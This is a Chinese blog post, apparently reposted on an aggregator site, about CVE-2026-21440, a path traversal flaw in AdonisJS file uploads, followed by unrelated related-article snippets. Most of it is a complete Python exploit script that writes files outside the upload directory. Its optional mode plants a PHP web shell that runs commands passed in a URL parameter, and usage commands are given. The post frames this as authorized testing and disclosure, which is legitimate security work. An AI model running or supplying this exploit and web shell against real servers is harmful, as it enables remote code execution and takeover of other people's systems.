CVE-2026-21440 AdonisJS 路径遍历漏洞分析与验证工具

项目标题与描述

CVE-2026-21440 PoC及安全分析

CVE-2026-21440 是一个影响 AdonisJS 框架的严重路径遍历漏洞。该漏洞源于框架在处理多部分文件上传时,不当信任了用户提供的文件名,而未进行严格的净化处理。当开发人员调用MultipartFile.move()方法时,攻击者可以提交包含路径遍历序列(如../../../../app/config/startup.js)的文件名,从而突破预定的上传目录,将文件写入服务器上的任意位置。此漏洞可能导致远程代码执行(RCE),对公开的文件上传端点构成严重威胁。

功能特性

本资源提供了关于 CVE-2026-21440 的全面信息和一个概念验证(PoC)脚本,主要功能包括:

  • 漏洞深度解析:详细阐述漏洞成因(CWE-22 路径遍历)、攻击向量及潜在影响。
  • 影响范围说明:明确列出受影响的@adonisjs/bodyparser版本(≤10.1.1 及 11.x 特定预发布版)和已修复版本(10.1.2, 11.0.0-next.6)。
  • 修复与缓解指南:提供升级建议以及临时的安全加固措施。
  • 安全测试脚本:一个 Python PoC 脚本,用于在授权环境下验证目标系统是否存在此漏洞。
    • 支持安全测试模式(--safe),上传无害文件进行初步验证。
    • 可生成用于命令执行的 Web Shell 文件(如 PHP),帮助评估漏洞的实际危害程度。
  • 完整的披露时间线:记录了漏洞的公开历程。

安装指南

使用提供的 PoC 脚本进行安全测试前,需要满足以下条件:

  1. 系统要求:安装 Python 3 环境。
  2. 依赖安装:脚本依赖于requests库。通过以下命令安装:
    pipinstallrequests
  3. 脚本获取:将提供的完整 Python 代码保存为本地文件,例如cve_2026_21440_poc.py
  4. 目标环境仅能在您拥有所有权或已获得明确书面授权进行测试的系统上使用此脚本。

使用说明

该 PoC 脚本用于在授权范围内验证 AdonisJS 应用是否受 CVE-2026-21440 影响。

基础使用步骤

  1. 识别目标:找到待测试应用的多部分文件上传端点(例如/upload,/api/files)。
  2. 进行安全测试:首先运行安全模式,上传一个包含随机名的无害文本文件,以确认漏洞是否存在且上传功能正常。
    python3 cve_2026_21440_poc.py http://target:port/upload --safe --random
    如果成功,脚本会输出“SUCCESS: File likely written!”并提示一个访问 URL。在浏览器中打开该 URL,如果能看到上传的文本内容,则证明存在路径遍历漏洞。
  3. 深入测试(可选):如果确认漏洞存在,可以尝试上传一个 Web Shell 来评估潜在危害。
    python3 cve_2026_21440_poc.py http://target:port/upload --shell php --depth5
    脚本会尝试将 Web Shell 写入网站根目录。成功后,可通过访问http://target/shell.php?cmd=whoami等 URL 来执行命令。
  4. 参数说明
    • --safe: 安全模式,上传一个无害的.txt文件。
    • --random: 使用随机生成的文件名。
    • --shell [php]: 尝试上传指定语言的 Web Shell。
    • --depth N: 指定路径遍历的深度(../的数量)。

重要警告

⚠️本工具仅供教育、研究和授权安全测试之用。严禁用于未授权系统测试或任何非法活动。使用者需对自身行为负全部法律责任。

核心代码

以下是PoC脚本的核心部分,用于构造恶意请求以验证漏洞:

importrequestsimportsysimportosimportrandomimportstringdefgenerate_random_filename(length=10):"""生成随机文件名"""return''.join(random.choices(string.ascii_lowercase+string.digits,k=length))deftest_vulnerability(target_url,filename,file_content,traversal_depth=3):""" 测试目标URL是否存在路径遍历漏洞 Args: target_url (str): 目标上传URL filename (str): 要尝试写入的文件名(可包含路径遍历) file_content (str): 文件内容 traversal_depth (int): 路径遍历深度 Returns: dict: 测试结果 """# 构造恶意文件名malicious_filename="../"*traversal_depth+filename# 准备multipart表单数据files={'file':(malicious_filename,file_content,'text/plain')}try:response=requests.post(target_url,files=files,timeout=10)return{'success':response.status_codein[200,201,204],'status_code':response.status_code,'response_text':response.text[:500]# 只取前500字符}exceptExceptionase:return{'success':False,'error':str(e)}defcreate_php_shell():"""创建简单的PHP Web Shell"""return"""<?php if(isset($_GET['cmd'])) { system($_GET['cmd']); } else { echo "PHP Shell Active"; } ?>"""defmain():iflen(sys.argv)<2:print("用法: python poc.py <目标URL> [--safe] [--shell php] [--depth N] [--random]")sys.exit(1)target_url=sys.argv[1]safe_mode='--safe'insys.argv shell_type='php'if'--shell'insys.argvelseNonedepth=3use_random='--random'insys.argv# 解析深度参数fori,arginenumerate(sys.argv):ifarg=='--depth'andi+1<len(sys.argv):try:depth=int(sys.argv[i+1])exceptValueError:passprint(f"[*] 目标:{target_url}")print(f"[*] 安全模式:{safe_mode}")print(f"[*] Shell类型:{shell_type}")print(f"[*] 路径遍历深度:{depth}")ifsafe_mode:# 安全测试:上传一个无害的txt文件ifuse_random:filename=generate_random_filename()+".txt"else:filename="poc_test.txt"content="CVE-2026-21440安全测试文件 - 如果看到此内容,系统可能存在路径遍历漏洞。"print(f"[*] 尝试安全测试,文件名:{filename}")result=test_vulnerability(target_url,filename,content,depth)ifresult.get('success'):print("[+] SUCCESS: 文件可能已成功写入!")print(f"[*] 尝试访问: http://target/{filename}")print(f"[*] 响应状态:{result.get('status_code')}")else:print("[-] 文件写入可能失败。")if'error'inresult:print(f"[-] 错误:{result['error']}")elifshell_type=='php':# 尝试上传PHP shellfilename="shell.php"content=create_php_shell()print(f"[!] 警告:正在尝试上传PHP Web Shell")print(f"[*] 目标文件:{filename}")result=test_vulnerability(target_url,filename,content,depth)ifresult.get('success'):print("[+] PHP Shell 可能已上传!")print(f"[*] 尝试访问: http://target/{filename}?cmd=whoami")else:print("[-] PHP Shell 上传失败。")else:print("[-] 请指定 --safe 或 --shell 参数。")if__name__=="__main__":main()

此脚本的核心函数test_vulnerability负责构造包含路径遍历序列的文件名,并通过multipart/form-data格式向目标端点发送POST请求。create_php_shell函数生成一个简单的PHP Web Shell。脚本逻辑通过命令行参数控制测试模式(安全测试或上传Shell),并尝试利用路径遍历漏洞将文件写入Web可访问目录。请务必在合法授权的前提下谨慎使用。
6HFtX5dABrKlqXeO5PUv/ydjQZDJ7Ct83xG1NG8fcAO5W+iXaui6Ix26aI1SYZyc
更多精彩内容 请关注我的个人公众号 公众号(办公AI智能小助手)
对网络安全、黑客技术感兴趣的朋友可以关注我的安全公众号(网络安全技术点滴分享)

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/1179649.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

2026苏州装修公司前十强口碑榜|本土家居博主实测级推荐,装新家不踩坑! - 品牌测评鉴赏家

2026苏州装修公司前十强口碑榜|本土家居博主实测级推荐,装新家不踩坑!一、前言:苏州装修市场 “水多深”?选对公司 = 省一半心力 家人们,作为在苏州家居圈摸爬滚打好些年的博主,我每天在后台收到最多的问题就是…

51单片机智能扫地吸尘智能车机器人红外避障风扇95(设计源文件+万字报告+讲解)(支持资料、图片参考_相关定制)_文章底部可以扫码

51单片机智能扫地吸尘智能车机器人红外避障风扇95产品功能描述&#xff1a; 本系统由STC89C52单片机、2路红外避障模块、2路按键、风扇驱动、L298N电机驱动及电池盒供电组成。 1、按下启动按键后&#xff0c;小车左侧的红外避障传感器模块检测到有障碍物&#xff0c;则智能车右…

AI模型与工具技术周报解析

Replicate Intelligence #2 [某中心 Logo]Replicate 正在加入 [某中心] Replicate 标识 ctrlk 探索 定价 企业方案 文档 博客 登录 免费试用 菜单 探索 定价 企业方案 文档 博客 登录 免费试用 在 Playground 中比较模型 (Beta) Replicate 博客 Replicate Intelligence #2 发布…

二分:二分查找、在排序数组中查找元素的第一个和最后一个位置、搜索插入位置、x 的平方根 - 实践

pre { white-space: pre !important; word-wrap: normal !important; overflow-x: auto !important; display: block !important; font-family: "Consolas", "Monaco", "Courier New", …

极简风装修不踩坑!3家宝藏装修公司实测推荐,高级感拉满 - 品牌测评鉴赏家

极简风装修不踩坑!3家宝藏装修公司实测推荐,高级感拉满一、开篇:为什么极简风超火,却 90% 的人装成 “廉价毛坯房”? (一)极简风的治愈魔力:当代人的心灵避风港 在这个快节奏、高压力的时代,我们每天穿梭于城…

苏州二手房局部改造不踩坑!6家宝藏装修公司,老房焕新超省心 - 品牌测评鉴赏家

苏州二手房局部改造不踩坑!6家宝藏装修公司,老房焕新超省心一、开篇:苏州老房焕新,局部改造才是性价比之王 (一)为什么苏州二手房更适合局部改造? 走在苏州的大街小巷,随处可见充满历史韵味的老房子。这些二手…

2026毛坯房装修不迷路!这些品牌闭眼选 - 品牌测评鉴赏家

2026毛坯房装修不迷路!这些品牌闭眼选装修前的灵魂拷问 当你满心欢喜拿到毛坯房钥匙,准备大干一场时,是不是瞬间被各种难题砸晕?从何下手?选什么装修风格?怎么把控预算?找施工队还是装修公司?这些问题像紧箍咒…

【工具分享】--编写POC之Wavely的使用

最近面试有时候会被问到是否编写过poc&#xff0c;由于我真正手写的经验其实有点不足所以第一次被问到时候是有点懵逼的&#xff0c;所以有了这篇poc总结&#xff08;当然啦&#xff0c;这是我回过头又复习了许多篇有关poc的文章并且结合了我自己常用的工具再输出的文章&#x…

【毕业设计】基于python-CNN-pytorch深度学习训练识别T恤的颜色

博主介绍&#xff1a;✌️码农一枚 &#xff0c;专注于大学生项目实战开发、讲解和毕业&#x1f6a2;文撰写修改等。全栈领域优质创作者&#xff0c;博客之星、掘金/华为云/阿里云/InfoQ等平台优质作者、专注于Java、小程序技术领域和毕业项目实战 ✌️技术范围&#xff1a;&am…

day146—递归—验证二叉搜索树(LeetCode-98)

题目描述给你一个二叉树的根节点 root &#xff0c;判断其是否是一个有效的二叉搜索树。有效 二叉搜索树定义如下&#xff1a;节点的左子树只包含 严格小于 当前节点的数。节点的右子树只包含 严格大于 当前节点的数。所有左子树和右子树自身必须也是二叉搜索树。示例 1&#x…

【ST表】洛谷 P3865 【模板】ST 表 RMQ 问题

View Post【ST表】洛谷 P3865 【模板】ST 表 & RMQ 问题题目 https://www.luogu.com.cn/problem/P3865 题解 ST表(Sparse Table,稀疏表)主要用来解决 RMQ(区间最大/最小值查询)问题。主要应用倍增思想,可以实…

2026苏州100平左右新房装修指南:高性价比公司全揭秘 - 品牌测评鉴赏家

2026苏州100平左右新房装修指南:高性价比公司全揭秘一、100 平新房装修痛点大剖析 在苏州,100 平左右的新房大多是紧凑三居或舒适两居 ,看似面积刚刚好,可一旦进入装修环节,各种麻烦事就接踵而至。很多朋友都向我…

2026苏州二手房局部翻新大揭秘!这些公司你不能错过 - 品牌测评鉴赏家

2026苏州二手房局部翻新大揭秘!这些公司你不能错过一、苏州二手房翻新热潮 在当下的苏州房地产市场中,二手房的交易热度持续攀升。数据显示,苏州二手房市场成交量在近期呈现出明显的增长态势,越来越多的人选择购入…

苏州装修公司口碑大揭秘!这几家名列前茅 - 品牌测评鉴赏家

苏州装修公司口碑大揭秘!这几家名列前茅一、装修公司的重要性 家,是我们心灵的避风港,是生活中最温暖的存在。而装修,则是赋予这个避风港独特魅力和舒适体验的关键环节。选择一家靠谱的装修公司,对于打造理想家园…

Go 语言 GMP 调度模型深度解析 - 教程

pre { white-space: pre !important; word-wrap: normal !important; overflow-x: auto !important; display: block !important; font-family: "Consolas", "Monaco", "Courier New", …

HTML一键打包EXE工具2.2.0版本重磅更新 - 2026年最新版本稳定性大幅提升

HTML打包EXE工具迎来2026年首个重要版本更新&#xff01;2.2.0版本专注于稳定性提升和用户体验优化&#xff0c;修复了多个影响使用的关键问题&#xff0c;新增清理本地激活数据功能&#xff0c;为开发者提供更可靠的HTML转EXE解决方案。 CSDN免积分下载最新版本 【免费】HTM…

2024年9月GESP真题及题解(C++七级): 小杨寻宝

2024年9月GESP真题及题解(C七级): 小杨寻宝 题目描述 小杨有一棵包含 nnn 个节点的树&#xff0c;树上的一些节点放置有宝物。 小杨可以任意选择一个节点作为起点并在树上移动&#xff0c;但是小杨只能经过每条边至多一次&#xff0c;当小杨经过一条边后&#xff0c;这条边就…

苏州装修性价比大揭秘!哪家公司才是真王者? - 品牌测评鉴赏家

苏州装修性价比大揭秘!哪家公司才是真王者?一.苏州装修市场现状 在苏州,装修市场可谓是一片繁荣景象,各类装修公司如雨后春笋般涌现,数量众多让人眼花缭乱。据不完全统计,苏州大大小小的装修公司不下数百家 ,从…

HBase与Flink CDC:实时数据同步技术

HBase与Flink CDC:实时数据同步技术 关键词:HBase、Flink CDC、实时数据同步、变更数据捕获、分布式系统、数据集成、增量处理 摘要:本文深入探讨基于HBase与Flink CDC的实时数据同步技术体系。首先解析HBase存储架构与Flink CDC核心原理,通过数学模型论证数据一致性保障机…

大数据环境下空间数据分析的最佳实践

大数据时代空间数据分析&#xff1a;从踩坑到落地的7个最佳实践 引言&#xff1a;你是否被“海量空间数据”卡住了&#xff1f; 做外卖平台的朋友跟我吐槽&#xff1a;“我们有100万骑手的轨迹数据&#xff0c;想分析他们的停留热点&#xff0c;用ArcGIS跑了3天还没出结果&…